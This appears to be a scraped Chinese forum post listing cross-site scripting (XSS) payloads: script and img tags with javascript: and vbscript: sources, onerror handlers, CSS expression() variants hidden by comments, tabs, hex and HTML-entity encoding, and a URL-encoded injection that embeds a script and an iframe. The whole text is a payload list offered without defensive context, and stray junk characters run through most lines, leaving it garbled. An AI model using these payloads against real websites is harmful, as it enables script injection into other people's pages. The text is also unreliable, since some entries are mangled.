<script>alert("跨站")</script> (最常用); y- @' ], F+ K+ E% t% s
<img scr=javascript:alert("跨站")></img>
; T5 _& }4 U' {$ w<img scr="javascript: alert(/跨站/)></img>9 H0 J- ~0 b) j3 |2 ?3 S
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)8 v! o' B5 H' o$ L% n
<img scr="#" onerror=alert(/跨站/)></img>( \! Q% n0 Z; E% U
<img scr="#" style="xss:expression(alert(/xss/));"></img>8 |% J7 d3 O- [
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
% n ]- B, N3 v. H3 p2 {0 g& e<img src=vbscript:msgbox ("xss")></img>
5 Q: d. X0 Q& L3 T% o: N5 s<style> input {left:expression (alert('xss'))}</style>, t* B; q% K( A% H! c+ X1 s
<div style={left:expression (alert('xss'))}></div>
; v1 s5 l( R. c; r<div style={left:exp/* */ression (alert('xss'))}></div>
+ }; p2 l- |3 e1 `5 E. W<div style={left:\0065\0078ression (alert('xss'))}></div>' U- b3 R% t& w' o, ~+ _! R
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>9 v1 k- e$ Z) V) G8 P( n' ^
unicode <div style="{left:expRessioN (alert('xss'))}">
7 [! q4 K$ j- e4 b* h4 d1 G+ G' W. ?- J9 B
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
$ p! q5 L- V" m9 j4 p' Q/ H4 M |